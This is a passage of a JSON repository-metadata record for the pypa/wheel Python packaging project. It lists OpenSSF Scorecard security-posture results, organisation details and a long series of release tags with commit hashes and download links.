https://app.stepsecurity.io/secureworkflow/pypa/wheel/publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/publish.yml:56: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:31: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/test.yml:53: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/test.yml/main?enable=pin","Warn: pipCommand not pinned by hash: .github/workflows/publish.yml:23","Warn: pipCommand not pinned by hash: .github/workflows/test.yml:41","Warn: pipCommand not pinned by hash: .github/workflows/test.yml:43","Warn: pipCommand not pinned by hash: .github/workflows/test.yml:46","Info:   0 out of   7 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of   4 third-party GitHubAction dependencies pinned","Info:   0 out of   4 pipCommand dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"Maintained","score":1,"reason":"1 commit(s) and 1 issue activity found in the last 90 days -- score normalized to 1","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Code-Review","score":2,"reason":"Found 8/27 approved changesets -- score normalized to 2","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: jobLevel 'contents' permission set to 'write': .github/workflows/publish.yml:48","Warn: no topLevel permission defined: .github/workflows/publish.yml:1","Warn: no topLevel permission defined: .github/workflows/test.yml:1"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"Fuzzing","score":10,"reason":"project is fuzzed","details":["Info: OSSFuzz integration found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE.txt:0","Info: FSF or OSI recognized license: MIT License: LICENSE.txt:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Vulnerabilities","score":10,"reason":"0 existing vulnerabilities detected","details":null,"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Packaging","score":10,"reason":"packaging workflow detected","details":["Info: Project packages its releases by way of GitHub Actions.: .github/workflows/publish.yml:31"],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Branch-Protection","score":0,"reason":"branch protection not enabled on development/release branches","details":["Warn: branch protection not enabled for branch 'main'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Security-Policy","score":0,"reason":"security policy file not detected","details":["Warn: no security policy file detected","Warn: no security file to analyze","Warn: no security file to analyze","Warn: no security file to analyze"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"SAST","score":5,"reason":"SAST tool is not run on all commits -- score normalized to 5","details":["Warn: 6 commits out of 12 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}}]},"last_synced_at":"2025-08-22T20:33:25.724Z","repository_id":23174547,"created_at":"2025-08-22T20:33:25.724Z","updated_at":"2025-08-22T20:33:25.724Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":281742688,"owners_count":26553720,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","status":"online","status_checked_at":"2025-10-30T02:00:06.501Z","response_time":61,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"pypa","name":"Python Packaging Authority","uuid":"647025","kind":"organization","description":"","email":"info@pypa.io","website":"https://www.pypa.io","location":"United States of America","twitter":null,"company":null,"icon_url":"https://avatars.githubusercontent.com/u/647025?v=4","repositories_count":58,"last_synced_at":"2025-10-30T00:34:30.821Z","metadata":{"has_sponsors_listing":true},"html_url":"https://github.com/pypa","funding_links":["https://github.com/sponsors/pypa"],"total_stars":88807,"followers":2132,"following":0,"created_at":"2022-11-02T16:21:37.826Z","updated_at":"2025-10-30T00:34:30.821Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/pypa","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/pypa/repositories"},"tags":[{"name":"0.46.1","sha":"7a0ea7f7c3dd73747e37368bb074cd0d9fb49259","kind":"commit","published_at":"2025-04-08T20:53:52.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.46.1","html_url":"https://github.com/pypa/wheel/releases/tag/0.46.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.46.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.46.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.46.1/manifests"},{"name":"0.46.0","sha":"1da658384bbfc14c091085bb98828e68368a1ed5","kind":"commit","published_at":"2025-04-03T09:39:52.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.46.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.46.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.46.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.46.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.46.0/manifests"},{"name":"0.45.1","sha":"7855525de4093257e7bfb434877265e227356566","kind":"commit","published_at":"2024-11-23T00:14:12.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.45.1","html_url":"https://github.com/pypa/wheel/releases/tag/0.45.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.45.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.45.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.45.1/manifests"},{"name":"0.45.0","sha":"d78f0e372199f8294556345d867af4d3cf118418","kind":"commit","published_at":"2024-11-08T21:40:06.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.45.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.45.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.45.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.45.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.45.0/manifests"},{"name":"0.44.0","sha":"7bb46d7727e6e89fe56b3c78297b3af2672bbbe2","kind":"commit","published_at":"2024-08-04T14:48:22.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.44.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.44.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.44.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.44.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.44.0/manifests"},{"name":"0.43.0","sha":"fa33dfd01fd665c1fd90097563b34bce4b5527ef","kind":"commit","published_at":"2024-03-11T19:28:01.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.43.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.43.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.43.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.43.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.43.0/manifests"},{"name":"0.42.0","sha":"63a09bb3d92630c1d35f4fcc6f79250256aeeb5c","kind":"commit","published_at":"2023-11-26T14:35:45.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.42.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.42.0/manifests"},{"name":"0.41.3","sha":"a899f1c69ffddf564b904a5de974457c213dc36a","kind":"commit","published_at":"2023-10-30T10:04:00.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.41.3","html_url":"https://github.com/pypa/wheel/releases/tag/0.41.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.41.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.41.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.41.3/manifests"},{"name":"0.41.2","sha":"e76040b0d970a0fe6211c31888fc929078ba02d9","kind":"commit","published_at":"2023-08-22T09:29:26.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.41.2","html_url":"https://github.com/pypa/wheel/releases/tag/0.41.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.41.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.41.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.41.2/manifests"},{"name":"0.41.1","sha":"b626a4a2ee6a887c7ad4b984fcb4d465dbfa337d","kind":"commit","published_at":"2023-08-05T13:31:27.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.41.1","html_url":"https://github.com/pypa/wheel/releases/tag/0.41.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.41.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.41.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.41.1/manifests"},{"name":"0.41.0","sha":"95c2d83cde174ed3c34d5a5b53dc3b3a1ace91b6","kind":"commit","published_at":"2023-07-22T10:59:41.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.41.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.41.0/manifests"},{"name":"0.40.0","sha":"461f7a3a2d4824009ca4855b3300d61e6d405dc4","kind":"commit","published_at":"2023-03-14T14:38:44.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.40.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.40.0/manifests"},{"name":"0.38.4","sha":"814c2efe8e40051039c5a6de6945e04ecdd162ee","kind":"commit","published_at":"2022-11-09T20:33:01.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.38.4","html_url":"https://github.com/pypa/wheel/releases/tag/0.38.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.38.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.38.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.38.4/manifests"},{"name":"0.38.3","sha":"daeb157c8207b1459fc7baa5f234c165a7a5faf4","kind":"commit","published_at":"2022-11-08T17:46:24.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.38.3","html_url":"https://github.com/pypa/wheel/releases/tag/0.38.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.38.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.38.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.38.3/manifests"},{"name":"0.38.2","sha":"44193907eb308930de05deed863fb4d157c5c866","kind":"commit","published_at":"2022-11-05T12:52:57.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.38.2","html_url":"https://github.com/pypa/wheel/releases/tag/0.38.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.38.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.38.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.38.2/manifests"},{"name":"0.38.1","sha":"6f1608dc1a88f00d2390b9044bd655753f39234c","kind":"commit","published_at":"2022-11-04T09:09:25.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.38.1","html_url":"https://github.com/pypa/wheel/releases/tag/0.38.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.38.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.38.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.38.1/manifests"},{"name":"0.38.0","sha":"fcb94cd51f7dfd40d88dff37415750d9e3638d3b","kind":"commit","published_at":"2022-10-20T21:19:31.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.38.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.38.0/manifests"},{"name":"0.37.1","sha":"c716c87ffa528ac9a31de3ed3217058848dc2cd2","kind":"commit","published_at":"2021-12-22T12:19:07.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.37.1","html_url":"https://github.com/pypa/wheel/releases/tag/0.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.37.1/manifests"},{"name":"0.37.0","sha":"b8c4aa055cea0132776e7e53edce3538710d5b68","kind":"commit","published_at":"2021-08-09T20:44:19.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.37.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.37.0/manifests"},{"name":"0.36.2","sha":"4fb47f98550f3f43fc0b8c73f518592124ae21bd","kind":"commit","published_at":"2020-12-13T18:07:13.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.36.2","html_url":"https://github.com/pypa/wheel/releases/tag/0.36.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.36.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.36.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.36.2/manifests"},{"name":"0.36.1","sha":"64550e15fdbc96d5690dc872257edc859c218068","kind":"commit","published_at":"2020-12-04T14:00:01.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.36.1","html_url":"https://github.com/pypa/wheel/releases/tag/0.36.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.36.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.36.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.36.1/manifests"},{"name":"0.36.0","sha":"39b6397ba944d82f1fe37d043382f97b78a919d6","kind":"commit","published_at":"2020-12-01T08:52:46.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.36.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.36.0/manifests"},{"name":"0.35.1","sha":"bbc60829bea2eb25ccd236b9c6c16c9ee4f0d2ef","kind":"commit","published_at":"2020-08-14T19:22:54.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.35.1","html_url":"https://github.com/pypa/wheel/releases/tag/0.35.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.35.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.35.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.35.1/manifests"},{"name":"0.35.0","sha":"4253bbb865823101d1a1757d12239fc74f49c4e7","kind":"commit","published_at":"2020-08-13T21:08:53.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.35.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.35.0/manifests"},{"name":"0.34.2","sha":"0036f80513457a95a309c81d8a63f113b52dbafa","kind":"commit","published_at":"2020-01-30T22:20:12.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.34.2","html_url":"https://github.com/pypa/wheel/releases/tag/0.34.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.34.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.34.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.34.2/manifests"},{"name":"0.34.1","sha":"43078c409ebe9b7d5d70c2476fcb82055e8f0b97","kind":"tag","published_at":"2020-01-27T20:20:14.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.34.1","html_url":"https://github.com/pypa/wheel/releases/tag/0.34.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.34.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.34.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.34.1/manifests"},{"name":"0.34.0","sha":"8b2312799f46359ac78f3b011dc758c45518e9e1","kind":"commit","published_at":"2020-01-27T08:21:26.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.34.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.34.0/manifests"},{"name":"0.33.6","sha":"b227ddd5beaba49294017d061d501f6d433393b0","kind":"commit","published_at":"2019-08-18T09:55:37.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.33.6","html_url":"https://github.com/pypa/wheel/releases/tag/0.33.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.33.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.6/manifests"},{"name":"0.33.5","sha":"9ee9726620f80232ca49991dbeef83963d94482a","kind":"commit","published_at":"2019-08-17T16:13:24.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.33.5","html_url":"https://github.com/pypa/wheel/releases/tag/0.33.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.33.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.5/manifests"},{"name":"0.33.4","sha":"882cd05d9bf4c4fc72568d806e227b5cf14df1d7","kind":"commit","published_at":"2019-05-11T21:41:35.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.33.4","html_url":"https://github.com/pypa/wheel/releases/tag/0.33.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.33.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.4/manifests"},{"name":"0.33.3","sha":"7b782219d5322ee66cef293c5c5b49fbd4133a0d","kind":"commit","published_at":"2019-05-10T11:06:01.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.33.3","html_url":"https://github.com/pypa/wheel/releases/tag/0.33.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.33.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.3/manifests"},{"name":"0.33.2","sha":"9534258081b4abf3af817dab976bc95ecc4bfa30","kind":"commit","published_at":"2019-05-09T08:18:30.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.33.2","html_url":"https://github.com/pypa/wheel/releases/tag/0.33.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.33.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.2/manifests"},{"name":"0.33.1","sha":"c15924d80ed2235f277569d99bb9d80f59c9b19d","kind":"commit","published_at":"2019-02-19T14:03:57.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.33.1","html_url":"https://github.com/pypa/wheel/releases/tag/0.33.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.33.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.1/manifests"},{"name":"0.33.0","sha":"bb54233a2dc855951fa40a48d5730c67f9d570c8","kind":"commit","published_at":"2019-02-12T06:58:33.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.33.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.0/manifests"},{"name":"0.32.3","sha":"11584b78a56b4eedba4eedc55c9dac8aa2dd7070","kind":"commit","published_at":"2018-11-19T00:16:37.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.32.3","html_url":"https://github.com/pypa/wheel/releases/tag/0.32.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.32.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.32.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.32.3/manifests"},{"name":"0.32.2","sha":"3d3708c659f7b9988f958539e7748a1a01ee6e77","kind":"commit","published_at":"2018-10-20T20:03:14.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.32.2","html_url":"https://github.com/pypa/wheel/releases/tag/0.32.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.32.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.32.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.32.2/manifests"},{"name":"0.32.1","sha":"e284ddf676adffa22f6d6a7b02be7328acfe23c4","kind":"commit","published_at":"2018-10-04T06:42:04.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.32.1","html_url":"https://github.com/pypa/wheel/releases/tag/0.32.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.32.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.32.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.32.1/manifests"},{"name":"0.32.0","sha":"46e55b9bc7ac63d4c3a4dee706515968d58848ac","kind":"commit","published_at":"2018-09-29T15:36:41.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.32.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.32.0","dependencies_parsed_at":null,"dependency_